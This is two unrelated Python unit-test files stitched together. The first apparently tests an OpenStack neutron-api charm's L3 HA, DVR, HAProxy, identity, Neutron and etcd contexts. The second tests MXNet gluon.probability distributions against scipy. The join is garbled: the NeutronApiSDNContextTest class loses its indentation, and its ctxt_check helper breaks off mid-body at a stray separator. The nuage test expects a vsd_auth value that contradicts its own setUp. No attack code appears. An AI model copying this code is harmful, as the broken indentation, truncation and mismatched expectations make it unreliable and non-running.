        self.assertEqual(context.get_l3ha(), True)

    def test_get_l3ha_prejuno(self):
        # L3 HA requires juno or later.
        self.test_config.set('enable-l3ha', True)
        self.test_config.set('overlay-network-type', 'gre')
        self.test_config.set('neutron-plugin', 'ovs')
        self.test_config.set('l2-population', False)
        self.os_release.return_value = 'icehouse'
        self.assertEqual(context.get_l3ha(), False)

    def test_get_l3ha_l2pop(self):
        # L3 HA is incompatible with l2-population.
        self.test_config.set('enable-l3ha', True)
        self.test_config.set('overlay-network-type', 'gre')
        self.test_config.set('neutron-plugin', 'ovs')
        self.test_config.set('l2-population', True)
        self.os_release.return_value = 'juno'
        self.assertEqual(context.get_l3ha(), False)

    def test_get_dvr(self):
        self.test_config.set('enable-dvr', True)
        self.test_config.set('enable-l3ha', False)
        self.test_config.set('overlay-network-type', 'vxlan')
        self.test_config.set('neutron-plugin', 'ovs')
        self.test_config.set('l2-population', True)
        self.os_release.return_value = 'juno'
        self.assertEqual(context.get_dvr(), True)

    def test_get_dvr_explicit_off(self):
        self.test_config.set('enable-dvr', False)
        self.test_config.set('enable-l3ha', False)
        self.test_config.set('overlay-network-type', 'vxlan')
        self.test_config.set('neutron-plugin', 'ovs')
        self.test_config.set('l2-population', True)
        self.os_release.return_value = 'juno'
        self.assertEqual(context.get_dvr(), False)

    def test_get_dvr_prejuno(self):
        # DVR requires juno or later.
        self.test_config.set('enable-dvr', True)
        self.test_config.set('enable-l3ha', False)
        self.test_config.set('overlay-network-type', 'vxlan')
        self.test_config.set('neutron-plugin', 'ovs')
        self.test_config.set('l2-population', True)
        self.os_release.return_value = 'icehouse'
        self.assertEqual(context.get_dvr(), False)

    def test_get_dvr_gre(self):
        # DVR over gre is only supported from kilo onwards.
        self.test_config.set('enable-dvr', True)
        self.test_config.set('enable-l3ha', False)
        self.test_config.set('overlay-network-type', 'gre')
        self.test_config.set('neutron-plugin', 'ovs')
        self.test_config.set('l2-population', True)
        self.os_release.return_value = 'juno'
        self.assertEqual(context.get_dvr(), False)

    def test_get_dvr_gre_kilo(self):
        self.test_config.set('enable-dvr', True)
        self.test_config.set('enable-l3ha', False)
        self.test_config.set('overlay-network-type', 'gre')
        self.test_config.set('neutron-plugin', 'ovs')
        self.test_config.set('l2-population', True)
        self.os_release.return_value = 'kilo'
        self.assertEqual(context.get_dvr(), True)

    def test_get_dvr_vxlan_kilo(self):
        self.test_config.set('enable-dvr', True)
        self.test_config.set('enable-l3ha', False)
        self.test_config.set('overlay-network-type', 'vxlan')
        self.test_config.set('neutron-plugin', 'ovs')
        self.test_config.set('l2-population', True)
        self.os_release.return_value = 'kilo'
        self.assertEqual(context.get_dvr(), True)

    def test_get_dvr_l3ha_on(self):
        # DVR and L3 HA are mutually exclusive.
        self.test_config.set('enable-dvr', True)
        self.test_config.set('enable-l3ha', True)
        self.test_config.set('overlay-network-type', 'vxlan')
        self.test_config.set('neutron-plugin', 'ovs')
        self.test_config.set('l2-population', False)
        self.os_release.return_value = 'juno'
        self.assertEqual(context.get_dvr(), False)

    def test_get_dvr_l2pop(self):
        # DVR requires l2-population to be enabled.
        self.test_config.set('enable-dvr', True)
        self.test_config.set('enable-l3ha', False)
        self.test_config.set('overlay-network-type', 'vxlan')
        self.test_config.set('neutron-plugin', 'ovs')
        self.test_config.set('l2-population', False)
        self.os_release.return_value = 'juno'
        self.assertEqual(context.get_dvr(), False)
class IdentityServiceContext(CharmTestCase):
    """Tests for context.IdentityServiceContext.

    NOTE(review): this test class shares its name with the context class
    under test; a rename to IdentityServiceContextTest would be clearer.
    """

    def setUp(self):
        super(IdentityServiceContext, self).setUp(context, TO_PATCH)
        self.relation_get.side_effect = self.test_relation.get
        self.config.side_effect = self.test_config.get
        self.test_config.set('region', 'region457')
        self.test_config.set('prefer-ipv6', False)

    @patch.object(charmhelpers.contrib.openstack.context, 'format_ipv6_addr')
    @patch.object(charmhelpers.contrib.openstack.context, 'context_complete')
    @patch.object(charmhelpers.contrib.openstack.context, 'relation_get')
    @patch.object(charmhelpers.contrib.openstack.context, 'related_units')
    @patch.object(charmhelpers.contrib.openstack.context, 'relation_ids')
    @patch.object(charmhelpers.contrib.openstack.context, 'log')
    def test_ids_ctxt(self, _log, _rids, _runits, _rget, _ctxt_comp,
                      format_ipv6_addr):
        """A complete identity relation yields the configured region."""
        _rids.return_value = 'rid1'
        _runits.return_value = 'runit'
        _ctxt_comp.return_value = True
        id_data = {
            'service_port': 9876,
            'service_host': '127.0.0.4',
            'auth_host': '127.0.0.5',
            'auth_port': 5432,
            'service_tenant': 'ten',
            'service_username': 'admin',
            'service_password': '<PASSWORD>',
        }
        _rget.return_value = id_data
        ids_ctxt = context.IdentityServiceContext()
        # assertEqual: assertEquals is a deprecated unittest alias.
        self.assertEqual(ids_ctxt()['region'], 'region457')

    @patch.object(charmhelpers.contrib.openstack.context, 'relation_ids')
    @patch.object(charmhelpers.contrib.openstack.context, 'log')
    def test_ids_ctxt_no_rels(self, _log, _rids):
        """Without an identity relation the context resolves to None."""
        _rids.return_value = []
        ids_ctxt = context.IdentityServiceContext()
        self.assertEqual(ids_ctxt(), None)
class HAProxyContextTest(CharmTestCase):
    """Tests for context.HAProxyContext.

    Fixes: removed a duplicate 'local_host' key from the expected context
    dict (duplicate dict-literal keys silently collapse to one entry) and
    replaced the deprecated assertEquals alias with assertEqual.
    """

    def setUp(self):
        super(HAProxyContextTest, self).setUp(context, TO_PATCH)
        self.determine_api_port.return_value = 9686
        self.determine_apache_port.return_value = 9686
        self.api_port = 9696

    def tearDown(self):
        super(HAProxyContextTest, self).tearDown()

    @patch.object(charmhelpers.contrib.openstack.context, 'relation_ids')
    @patch.object(charmhelpers.contrib.openstack.context, 'log')
    def test_context_No_peers(self, _log, _rids):
        """No ha-cluster peers -> no 'units' entry in the context."""
        _rids.return_value = []
        hap_ctxt = context.HAProxyContext()
        # __builtin__ patching: this test suite targets Python 2.
        with patch('__builtin__.__import__'):
            self.assertTrue('units' not in hap_ctxt())

    @patch.object(
        charmhelpers.contrib.openstack.context, 'get_netmask_for_address')
    @patch.object(
        charmhelpers.contrib.openstack.context, 'get_address_in_network')
    @patch.object(charmhelpers.contrib.openstack.context, 'config')
    @patch.object(charmhelpers.contrib.openstack.context, 'local_unit')
    @patch.object(charmhelpers.contrib.openstack.context, 'unit_get')
    @patch.object(charmhelpers.contrib.openstack.context, 'relation_get')
    @patch.object(charmhelpers.contrib.openstack.context, 'related_units')
    @patch.object(charmhelpers.contrib.openstack.context, 'relation_ids')
    @patch.object(charmhelpers.contrib.openstack.context, 'log')
    @patch.object(charmhelpers.contrib.openstack.context, 'kv')
    @patch('__builtin__.__import__')
    @patch('__builtin__.open')
    def test_context_peers(self, _open, _import, _kv, _log, _rids, _runits,
                           _rget, _uget, _lunit, _config,
                           _get_address_in_network, _get_netmask_for_address):
        """With a peer unit, the haproxy frontends/backends are populated."""
        unit_addresses = {
            'neutron-api-0': '10.10.10.10',
            'neutron-api-1': '10.10.10.11',
        }
        _rids.return_value = ['rid1']
        _runits.return_value = ['neutron-api/0']
        _rget.return_value = unit_addresses['neutron-api-0']
        _lunit.return_value = "neutron-api/1"
        _uget.return_value = unit_addresses['neutron-api-1']
        _config.return_value = None
        _get_address_in_network.return_value = None
        _get_netmask_for_address.return_value = '255.255.255.0'
        _kv().get.return_value = 'abcdefghijklmnopqrstuvwxyz123456'
        service_ports = {'neutron-server': [9696, 9686]}
        self.maxDiff = None
        ctxt_data = {
            'local_host': '127.0.0.1',
            'haproxy_host': '0.0.0.0',
            'stat_port': '8888',
            'stat_password': '<PASSWORD>',
            'frontends': {
                '10.10.10.11': {
                    'network': '10.10.10.11/255.255.255.0',
                    'backends': unit_addresses,
                }
            },
            'default_backend': '10.10.10.11',
            'service_ports': service_ports,
            'neutron_bind_port': 9686,
        }
        _import().api_port.return_value = 9696
        hap_ctxt = context.HAProxyContext()
        self.assertEqual(hap_ctxt(), ctxt_data)
        _open.assert_called_with('/etc/default/haproxy', 'w')
class NeutronCCContextTest(CharmTestCase):
    """Tests for context.NeutronCCContext across plugins and network types."""

    def setUp(self):
        super(NeutronCCContextTest, self).setUp(context, TO_PATCH)
        self.relation_get.side_effect = self.test_relation.get
        self.config.side_effect = self.test_config.get
        self.api_port = 9696
        self.determine_api_port.return_value = self.api_port
        self.test_config.set('neutron-plugin', 'ovs')
        self.test_config.set('neutron-security-groups', True)
        self.test_config.set('debug', True)
        self.test_config.set('verbose', True)
        self.test_config.set('neutron-external-network', 'bob')
        self.test_config.set('nsx-username', 'bob')
        self.test_config.set('nsx-password', '<PASSWORD>')
        self.test_config.set('nsx-tz-uuid', 'tzuuid')
        self.test_config.set('nsx-l3-uuid', 'l3uuid')
        self.test_config.set('nsx-controllers', 'ctrl1 ctrl2')
        self.test_config.set('vsd-server', '192.168.2.202')
        self.test_config.set('vsd-auth', 'fooadmin:password')
        self.test_config.set('vsd-organization', 'foo')
        self.test_config.set('vsd-base-uri', '/nuage/api/v1_0')
        self.test_config.set('vsd-netpart-name', 'foo-enterprise')
        self.test_config.set('plumgrid-username', 'plumgrid')
        self.test_config.set('plumgrid-password', '<PASSWORD>')
        self.test_config.set('plumgrid-virtual-ip', '192.168.100.250')
        self.test_config.set('midonet-origin', 'mem-1.9')
        self.test_config.set('mem-username', 'yousir')
        self.test_config.set('mem-password', '<PASSWORD>')
        self.test_config.set('enable-ml2-port-security', True)
        self.test_config.set('dhcp-agents-per-network', 3)

    def tearDown(self):
        super(NeutronCCContextTest, self).tearDown()

    @patch.object(context.NeutronCCContext, 'network_manager')
    @patch.object(context.NeutronCCContext, 'plugin')
    @patch('__builtin__.__import__')
    def test_neutroncc_context_no_setting(self, _import, plugin, nm):
        """Default config renders the expected context dict."""
        plugin.return_value = None
        ctxt_data = {
            'debug': True,
            'enable_dvr': False,
            'l3_ha': False,
            'dhcp_agents_per_network': 3,
            'enable_sriov': False,
            'external_network': 'bob',
            'neutron_bind_port': self.api_port,
            'verbose': True,
            'l2_population': True,
            'overlay_network_type': 'gre',
            'quota_floatingip': 50,
            'quota_health_monitors': -1,
            'quota_member': -1,
            'quota_network': 10,
            'quota_pool': 10,
            'quota_port': 50,
            'quota_router': 10,
            'quota_security_group': 10,
            'quota_security_group_rule': 100,
            'quota_subnet': 10,
            'quota_vip': 10,
            'vlan_ranges': 'physnet1:1000:2000',
            'vni_ranges': '1001:2000',
            'enable_ml2_port_security': True,
            'enable_hyperv': False
        }
        napi_ctxt = context.NeutronCCContext()
        with patch.object(napi_ctxt, '_ensure_packages'):
            self.assertEquals(ctxt_data, napi_ctxt())

    @patch.object(context.NeutronCCContext, 'network_manager')
    @patch.object(context.NeutronCCContext, 'plugin')
    @patch('__builtin__.__import__')
    def test_neutroncc_context_vxlan(self, _import, plugin, nm):
        """vxlan overlay: vni ranges and flat providers are comma-joined."""
        plugin.return_value = None
        self.test_config.set('flat-network-providers', 'physnet2 physnet3')
        self.test_config.set('overlay-network-type', 'vxlan')
        self.test_config.set('vni-ranges', '1001:2000 3001:4000')
        ctxt_data = {
            'debug': True,
            'enable_dvr': False,
            'l3_ha': False,
            'dhcp_agents_per_network': 3,
            'enable_sriov': False,
            'external_network': 'bob',
            'neutron_bind_port': self.api_port,
            'verbose': True,
            'l2_population': True,
            'overlay_network_type': 'vxlan',
            'quota_floatingip': 50,
            'quota_health_monitors': -1,
            'quota_member': -1,
            'quota_network': 10,
            'quota_pool': 10,
            'quota_port': 50,
            'quota_router': 10,
            'quota_security_group': 10,
            'quota_security_group_rule': 100,
            'quota_subnet': 10,
            'quota_vip': 10,
            'vlan_ranges': 'physnet1:1000:2000',
            'vni_ranges': '1001:2000,3001:4000',
            'network_providers': 'physnet2,physnet3',
            'enable_ml2_port_security': True,
            'enable_hyperv': False
        }
        napi_ctxt = context.NeutronCCContext()
        with patch.object(napi_ctxt, '_ensure_packages'):
            self.assertEquals(ctxt_data, napi_ctxt())

    @patch.object(context.NeutronCCContext, 'network_manager')
    @patch.object(context.NeutronCCContext, 'plugin')
    @patch('__builtin__.__import__')
    def test_neutroncc_context_l3ha(self, _import, plugin, nm):
        """l3ha enabled (juno): min/max agents-per-router keys appear."""
        plugin.return_value = None
        self.test_config.set('enable-l3ha', True)
        self.test_config.set('overlay-network-type', 'gre')
        self.test_config.set('neutron-plugin', 'ovs')
        self.test_config.set('l2-population', False)
        self.os_release.return_value = 'juno'
        ctxt_data = {
            'debug': True,
            'enable_dvr': False,
            'l3_ha': True,
            'enable_sriov': False,
            'external_network': 'bob',
            'neutron_bind_port': self.api_port,
            'verbose': True,
            'l2_population': False,
            'overlay_network_type': 'gre',
            'max_l3_agents_per_router': 2,
            'min_l3_agents_per_router': 2,
            'dhcp_agents_per_network': 3,
            'quota_floatingip': 50,
            'quota_health_monitors': -1,
            'quota_member': -1,
            'quota_network': 10,
            'quota_pool': 10,
            'quota_port': 50,
            'quota_router': 10,
            'quota_security_group': 10,
            'quota_security_group_rule': 100,
            'quota_subnet': 10,
            'quota_vip': 10,
            'vlan_ranges': 'physnet1:1000:2000',
            'vni_ranges': '1001:2000',
            'enable_ml2_port_security': True,
            'enable_hyperv': False
        }
        napi_ctxt = context.NeutronCCContext()
        with patch.object(napi_ctxt, '_ensure_packages'):
            self.assertEquals(ctxt_data, napi_ctxt())

    @patch.object(context.NeutronCCContext, 'network_manager')
    @patch.object(context.NeutronCCContext, 'plugin')
    @patch('__builtin__.__import__')
    def test_neutroncc_context_sriov(self, _import, plugin, nm):
        """enable-sriov toggles the enable_sriov context flag."""
        plugin.return_value = None
        self.test_config.set('enable-sriov', True)
        ctxt_data = {
            'debug': True,
            'enable_dvr': False,
            'l3_ha': False,
            'dhcp_agents_per_network': 3,
            'enable_sriov': True,
            'external_network': 'bob',
            'neutron_bind_port': self.api_port,
            'verbose': True,
            'l2_population': True,
            'overlay_network_type': 'gre',
            'quota_floatingip': 50,
            'quota_health_monitors': -1,
            'quota_member': -1,
            'quota_network': 10,
            'quota_pool': 10,
            'quota_port': 50,
            'quota_router': 10,
            'quota_security_group': 10,
            'quota_security_group_rule': 100,
            'quota_subnet': 10,
            'quota_vip': 10,
            'vlan_ranges': 'physnet1:1000:2000',
            'vni_ranges': '1001:2000',
            'enable_ml2_port_security': True,
            'enable_hyperv': False
        }
        napi_ctxt = context.NeutronCCContext()
        with patch.object(napi_ctxt, '_ensure_packages'):
            self.assertEquals(ctxt_data, napi_ctxt())

    @patch.object(context.NeutronCCContext, 'network_manager')
    @patch.object(context.NeutronCCContext, 'plugin')
    @patch('__builtin__.__import__')
    def test_neutroncc_context_unsupported_overlay(self, _import, plugin, nm):
        """An unsupported overlay network type raises at construction.

        Fix over the previous version: the assertRaises context manager was
        bound to the name ``context``, shadowing the module under test, so
        the body raised AttributeError and the test passed without ever
        exercising the real validation.
        """
        plugin.return_value = None
        self.test_config.set('overlay-network-type', 'bobswitch')
        with self.assertRaises(Exception):
            context.NeutronCCContext()

    @patch.object(context.NeutronCCContext, 'network_manager')
    @patch.object(context.NeutronCCContext, 'plugin')
    @patch('__builtin__.__import__')
    def test_neutroncc_context_api_rel(self, _import, plugin, nm):
        """Values from the neutron-api relation surface in the context."""
        nova_url = 'http://127.0.0.10'
        plugin.return_value = None
        self.related_units.return_value = ['unit1']
        self.relation_ids.return_value = ['rid2']
        self.test_relation.set({'nova_url': nova_url,
                                'restart_trigger': 'bob'})
        napi_ctxt = context.NeutronCCContext()
        self.assertEquals(nova_url, napi_ctxt()['nova_url'])
        self.assertEquals('bob', napi_ctxt()['restart_trigger'])
        self.assertEquals(self.api_port, napi_ctxt()['neutron_bind_port'])

    def test_neutroncc_context_manager(self):
        """Context properties reflect the configured ovs plugin."""
        napi_ctxt = context.NeutronCCContext()
        self.assertEquals(napi_ctxt.network_manager, 'neutron')
        self.assertEquals(napi_ctxt.plugin, 'ovs')
        self.assertEquals(napi_ctxt.neutron_security_groups, True)

    def test_neutroncc_context_manager_pkgs(self):
        """_ensure_packages is invokable (no package calls expected here)."""
        napi_ctxt = context.NeutronCCContext()
        with patch.object(napi_ctxt, '_ensure_packages') as ep:
            napi_ctxt._ensure_packages()
            ep.assert_has_calls([])

    @patch.object(context.NeutronCCContext, 'network_manager')
    @patch.object(context.NeutronCCContext, 'plugin')
    @patch('__builtin__.__import__')
    def test_neutroncc_context_nsx(self, _import, plugin, nm):
        """nsx plugin: controller list and credentials are exposed."""
        plugin.return_value = 'nsx'
        self.related_units.return_value = []
        self.test_config.set('neutron-plugin', 'nsx')
        napi_ctxt = context.NeutronCCContext()()
        expect = {
            'nsx_controllers': 'ctrl1,ctrl2',
            'nsx_controllers_list': ['ctrl1', 'ctrl2'],
            'nsx_l3_uuid': 'l3uuid',
            'nsx_password': '<PASSWORD>',
            'nsx_tz_uuid': 'tzuuid',
            'nsx_username': 'bob',
        }
        # Iterate the dict directly instead of iterkeys() (works on both
        # Python 2 and 3; behavior identical).
        for key in expect:
            self.assertEquals(napi_ctxt[key], expect[key])

    @patch.object(context.NeutronCCContext, 'network_manager')
    @patch.object(context.NeutronCCContext, 'plugin')
    @patch('__builtin__.__import__')
    def test_neutroncc_context_nuage(self, _import, plugin, nm):
        """vsp (Nuage) plugin: VSD connection settings are exposed."""
        plugin.return_value = 'vsp'
        self.related_units.return_value = ['vsdunit1']
        self.relation_ids.return_value = ['vsdrid2']
        self.test_config.set('neutron-plugin', 'vsp')
        napi_ctxt = context.NeutronCCContext()()
        expect = {
            'vsd_server': '192.168.2.202',
            'vsd_auth': '<PASSWORD>',
            'vsd_organization': 'foo',
            'vsd_base_uri': '/nuage/api/v1_0',
            'vsd_netpart_name': 'foo-enterprise',
        }
        for key in expect:
            self.assertEquals(napi_ctxt[key], expect[key])
class EtcdContextTest(CharmTestCase):
    """Tests for context.EtcdContext cluster-string handling."""

    def setUp(self):
        super(EtcdContextTest, self).setUp(context, TO_PATCH)
        self.relation_get.side_effect = self.test_relation.get
        self.config.side_effect = self.test_config.get
        self.test_config.set('neutron-plugin', 'Calico')

    def tearDown(self):
        super(EtcdContextTest, self).tearDown()

    def test_etcd_no_related_units(self):
        """No related etcd units yields an empty cluster string."""
        self.related_units.return_value = []
        expected = {'cluster': ''}
        self.assertEquals(expected, context.EtcdContext()())

    def test_some_related_units(self):
        """Related etcd units supply the cluster connection string."""
        self.related_units.return_value = ['unit1']
        self.relation_ids.return_value = ['rid2', 'rid3']
        cluster = (
            'testname=http://172.18.18.18:8888,'
            'testname=http://172.18.18.18:8888'
        )
        self.test_relation.set({'cluster': cluster})
        self.assertEquals({'cluster': cluster}, context.EtcdContext()())

    def test_early_exit(self):
        """A non-Calico plugin short-circuits to an empty cluster."""
        self.test_config.set('neutron-plugin', 'notCalico')
        self.related_units.return_value = ['unit1']
        self.relation_ids.return_value = ['rid2', 'rid3']
        self.test_relation.set({'ip': '172.18.18.18',
                                'port': 8888,
                                'name': 'testname'})
        self.assertEquals({'cluster': ''}, context.EtcdContext()())
class NeutronApiSDNContextTest(CharmTestCase):
def setUp(self):
    # Patch the context module's helpers and route relation_get through the
    # in-memory test relation fixture.
    super(NeutronApiSDNContextTest, self).setUp(context, TO_PATCH)
    self.relation_get.side_effect = self.test_relation.get
def tearDown(self):
    # Restore everything patched in setUp.
    super(NeutronApiSDNContextTest, self).tearDown()
def test_init(self):
    """The SDN context targets the subordinate interface, the neutron-api
    service and /etc/neutron/neutron.conf."""
    ctxt = context.NeutronApiSDNContext()
    self.assertEquals(ctxt.interfaces, ['neutron-plugin-api-subordinate'])
    self.assertEquals(ctxt.services, ['neutron-api'])
    self.assertEquals(ctxt.config_file, '/etc/neutron/neutron.conf')
@patch.object(charmhelpers.contrib.openstack.context, 'log')
@patch.object(charmhelpers.contrib.openstack.context, 'relation_get')
@patch.object(charmhelpers.contrib.openstack.context, 'related_units')
@patch.object(charmhelpers.contrib.openstack.context, 'relation_ids')
def ctxt_check(self, rel_settings, expect, _rids, _runits, _rget, _log):
self.test_relation.set(rel_settings)
_runits.return_value = ['unit1']
| |
<filename>tests/python/unittest/test_gluon_probability_v1.py<gh_stars>1-10
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Test gluon.probability with HybridBlock.hybrid_forward api
"""
import mxnet as mx
import numpy as _np
from mxnet import np, npx, autograd
from mxnet import gluon
import mxnet.gluon.probability as mgp
from mxnet.gluon.probability import StochasticBlock, StochasticSequential
from mxnet.gluon import HybridBlock
from mxnet.test_utils import use_np, assert_almost_equal
from numpy.testing import assert_array_equal
import pytest
import scipy.stats as ss
import scipy.special as scipy_special
import itertools
from numbers import Number
def prob_to_logit(prob):
    """Return the log-odds (logit) of probability ``prob``."""
    log_p = np.log(prob)
    log_one_minus_p = np.log1p(-prob)  # numerically stable log(1 - p)
    return log_p - log_one_minus_p
def _distribution_method_invoker(dist, func, *args):
"""Wrapper for invoking different types of class methods with one unified
interface.
Parameters
----------
dist : Distribution
func : method
"""
if (len(args) == 0):
out = getattr(dist, func)
if callable(out):
return out()
else:
return out
return getattr(dist, func)(*args)
def test_mgp_getF_v1():
    """getF resolves the ndarray/symbol frontend module for its inputs."""
    getF = mgp.utils.getF
    nd = mx.nd
    sym = mx.sym
    assert getF(nd.ones((2, 2)), nd.ones((2, 2))) == nd
    assert getF(sym.ones((2, 2)), sym.ones((2, 2))) == sym
    assert getF(1.0, 2.0) == nd
    # Mixing ndarray and symbol inputs must fail in either order. The
    # previous version placed both calls inside one pytest.raises block,
    # so the second call was never executed (the first raise exits the
    # block); each call now gets its own raises context.
    with pytest.raises(TypeError):
        getF(nd.ones((2, 2)), sym.ones((2, 2)))
    with pytest.raises(TypeError):
        getF(sym.ones((2, 2)), nd.ones((2, 2)))
@use_np
def test_gluon_uniform_v1():
    """Check mgp.Uniform log_prob/cdf/icdf/entropy against scipy.stats.uniform."""
    class TestUniform(HybridBlock):
        # Thin wrapper forwarding a single distribution method through
        # HybridBlock so both imperative and hybridized paths are exercised.
        def __init__(self, func):
            super(TestUniform, self).__init__()
            self._func = func
        def hybrid_forward(self, F, low, high, *args):
            uniform = mgp.Uniform(low, high, validate_args=True)
            return _distribution_method_invoker(uniform, self._func, *args)
    shapes = [(), (1,), (2, 3), 6]
    # Test log_prob
    for shape, hybridize in itertools.product(shapes, [True, False]):
        low = np.random.uniform(-1, 1, shape)
        high = low + np.random.uniform(0.5, 1.5, shape)
        samples = np.random.uniform(low, high)
        net = TestUniform("log_prob")
        if hybridize:
            net.hybridize()
        # Run twice — presumably to also exercise the cached graph after the
        # first hybridized call; TODO confirm.
        for i in range(2):
            mx_out = net(low, high, samples).asnumpy()
            np_out = ss.uniform(low.asnumpy(),
                                (high - low).asnumpy()).logpdf(samples.asnumpy())
            assert_almost_equal(mx_out, np_out, atol=1e-4,
                                rtol=1e-3, use_broadcast=False)
    # Test cdf
    for shape, hybridize in itertools.product(shapes, [True, False]):
        low = np.random.uniform(-1, 1, shape)
        high = low + np.random.uniform(0.5, 1.5, shape)
        samples = np.random.uniform(low, high)
        net = TestUniform("cdf")
        if hybridize:
            net.hybridize()
        mx_out = net(low, high, samples).asnumpy()
        np_out = ss.uniform(low.asnumpy(),
                            (high - low).asnumpy()).cdf(samples.asnumpy())
        assert_almost_equal(mx_out, np_out, atol=1e-4,
                            rtol=1e-3, use_broadcast=False)
    # Test icdf (quantile function): samples here are probabilities in [0, 1).
    for shape, hybridize in itertools.product(shapes, [True, False]):
        low = np.random.uniform(-1, 1, shape)
        high = low + np.random.uniform(0.5, 1.5, shape)
        samples = np.random.uniform(size=shape)
        net = TestUniform("icdf")
        if hybridize:
            net.hybridize()
        mx_out = net(low, high, samples).asnumpy()
        np_out = ss.uniform(low.asnumpy(),
                            (high - low).asnumpy()).ppf(samples.asnumpy())
        assert_almost_equal(mx_out, np_out, atol=1e-4,
                            rtol=1e-3, use_broadcast=False)
    # Test entropy
    for shape, hybridize in itertools.product(shapes, [True, False]):
        low = np.random.uniform(-1, 1, shape)
        high = low + np.random.uniform(0.5, 1.5, shape)
        net = TestUniform("entropy")
        if hybridize:
            net.hybridize()
        mx_out = net(low, high).asnumpy()
        np_out = ss.uniform(low.asnumpy(),
                            (high - low).asnumpy()).entropy()
        assert_almost_equal(mx_out, np_out, atol=1e-4,
                            rtol=1e-3, use_broadcast=False)
@use_np
def test_gluon_normal_v1():
    """Check mgp.Normal log_prob/cdf/icdf/entropy against scipy.stats.norm."""
    class TestNormal(HybridBlock):
        # Thin wrapper forwarding a single distribution method through
        # HybridBlock so both imperative and hybridized paths are exercised.
        def __init__(self, func):
            super(TestNormal, self).__init__()
            self._func = func
        def hybrid_forward(self, F, loc, scale, *args):
            normal = mgp.Normal(loc, scale, validate_args=True)
            return _distribution_method_invoker(normal, self._func, *args)
    shapes = [(), (1,), (2, 3), 6]
    # Test log_prob
    for shape, hybridize in itertools.product(shapes, [True, False]):
        loc = np.random.uniform(-1, 1, shape)
        scale = np.random.uniform(0.5, 1.5, shape)
        samples = np.random.normal(size=shape)
        net = TestNormal("log_prob")
        if hybridize:
            net.hybridize()
        mx_out = net(loc, scale, samples).asnumpy()
        np_out = ss.norm(loc.asnumpy(),
                         scale.asnumpy()).logpdf(samples.asnumpy())
        assert_almost_equal(mx_out, np_out, atol=1e-4,
                            rtol=1e-3, use_broadcast=False)
    # Test cdf
    for shape, hybridize in itertools.product(shapes, [True, False]):
        loc = np.random.uniform(-1, 1, shape)
        scale = np.random.uniform(0.5, 1.5, shape)
        samples = np.random.normal(size=shape)
        net = TestNormal("cdf")
        if hybridize:
            net.hybridize()
        mx_out = net(loc, scale, samples).asnumpy()
        np_out = ss.norm(loc.asnumpy(),
                         scale.asnumpy()).cdf(samples.asnumpy())
        assert_almost_equal(mx_out, np_out, atol=1e-4,
                            rtol=1e-3, use_broadcast=False)
    # Test icdf (quantile function): samples here are probabilities in [0, 1).
    for shape, hybridize in itertools.product(shapes, [True, False]):
        loc = np.random.uniform(-1, 1, shape)
        scale = np.random.uniform(0.5, 1.5, shape)
        samples = np.random.uniform(size=shape)
        net = TestNormal("icdf")
        if hybridize:
            net.hybridize()
        mx_out = net(loc, scale, samples).asnumpy()
        np_out = ss.norm(loc.asnumpy(),
                         scale.asnumpy()).ppf(samples.asnumpy())
        assert_almost_equal(mx_out, np_out, atol=1e-4,
                            rtol=1e-3, use_broadcast=False)
    # Test entropy
    for shape, hybridize in itertools.product(shapes, [True, False]):
        loc = np.random.uniform(-1, 1, shape)
        scale = np.random.uniform(0.5, 1.5, shape)
        net = TestNormal("entropy")
        if hybridize:
            net.hybridize()
        mx_out = net(loc, scale).asnumpy()
        np_out = ss.norm(loc.asnumpy(),
                         scale.asnumpy()).entropy()
        assert_almost_equal(mx_out, np_out, atol=1e-4,
                            rtol=1e-3, use_broadcast=False)
@use_np
def test_gluon_laplace_v1():
    """Check mgp.Laplace log_prob/cdf/icdf/entropy against scipy.stats.laplace."""
    class TestLaplace(HybridBlock):
        # Thin wrapper forwarding a single distribution method through
        # HybridBlock so both imperative and hybridized paths are exercised.
        def __init__(self, func):
            super(TestLaplace, self).__init__()
            self._func = func
        def hybrid_forward(self, F, loc, scale, *args):
            laplace = mgp.Laplace(loc, scale, validate_args=True)
            return _distribution_method_invoker(laplace, self._func, *args)
    shapes = [(), (1,), (2, 3), 6]
    # Test log_prob
    for shape, hybridize in itertools.product(shapes, [True, False]):
        loc = np.random.uniform(-1, 1, shape)
        scale = np.random.uniform(0.5, 1.5, shape)
        samples = np.random.laplace(size=shape)
        net = TestLaplace("log_prob")
        if hybridize:
            net.hybridize()
        mx_out = net(loc, scale, samples).asnumpy()
        np_out = ss.laplace(loc.asnumpy(),
                            scale.asnumpy()).logpdf(samples.asnumpy())
        assert_almost_equal(mx_out, np_out, atol=1e-4,
                            rtol=1e-3, use_broadcast=False)
    # Test cdf
    for shape, hybridize in itertools.product(shapes, [True, False]):
        loc = np.random.uniform(-1, 1, shape)
        scale = np.random.uniform(0.5, 1.5, shape)
        samples = np.random.laplace(size=shape)
        net = TestLaplace("cdf")
        if hybridize:
            net.hybridize()
        mx_out = net(loc, scale, samples).asnumpy()
        np_out = ss.laplace(loc.asnumpy(),
                            scale.asnumpy()).cdf(samples.asnumpy())
        assert_almost_equal(mx_out, np_out, atol=1e-4,
                            rtol=1e-3, use_broadcast=False)
    # Test icdf (quantile function): samples here are probabilities in [0, 1).
    for shape, hybridize in itertools.product(shapes, [True, False]):
        loc = np.random.uniform(-1, 1, shape)
        scale = np.random.uniform(0.5, 1.5, shape)
        samples = np.random.uniform(size=shape)
        net = TestLaplace("icdf")
        if hybridize:
            net.hybridize()
        mx_out = net(loc, scale, samples).asnumpy()
        np_out = ss.laplace(loc.asnumpy(),
                            scale.asnumpy()).ppf(samples.asnumpy())
        assert_almost_equal(mx_out, np_out, atol=1e-4,
                            rtol=1e-3, use_broadcast=False)
    # Test entropy
    for shape, hybridize in itertools.product(shapes, [True, False]):
        loc = np.random.uniform(-1, 1, shape)
        scale = np.random.uniform(0.5, 1.5, shape)
        net = TestLaplace("entropy")
        if hybridize:
            net.hybridize()
        mx_out = net(loc, scale).asnumpy()
        np_out = ss.laplace(loc.asnumpy(),
                            scale.asnumpy()).entropy()
        assert_almost_equal(mx_out, np_out, atol=1e-4,
                            rtol=1e-3, use_broadcast=False)
